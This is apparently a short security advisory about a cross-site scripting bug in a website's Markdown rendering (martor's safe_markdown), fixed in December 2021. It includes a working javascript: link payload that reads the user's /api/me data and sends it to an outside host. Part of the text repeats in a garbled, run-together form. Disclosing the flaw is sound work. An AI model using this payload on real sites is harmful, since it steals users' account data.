Unsanitized Markdown (martor, using safe_markdown) was shwon in the website, which allows XSS using the javascript: URL scheme.
For example:
[totally not xss](javascript:fetch(%27%2Fapi%2Fme%27).then(async%20(res)%3D%3Ewindow.location%20%3D%20%27https%3A%2F%2Fnyiyui.ca%2Ftotallynotxss%2F%27%20%2B%20encodeURIComponent(JSON.stringify(await%20res.json())))%3B)
/api/me and some other endpoints requires OAuth and therefore it is harder to use, but this vulnerability existed before OAuth was even implemented (#104), so it might've been exploited
Unsanitized Markdown (martor, using
safe_markdown) was shwon in the website, which allows XSS using thejavascript:URL scheme.For example:
(decoded JS)
/api/meand some other endpoints requires OAuth and therefore it is harder to use, but this vulnerability existed before OAuth was even implemented (#104), so it might've been exploitedFixed in production 2021-12-20T23:40:00±00:10:00.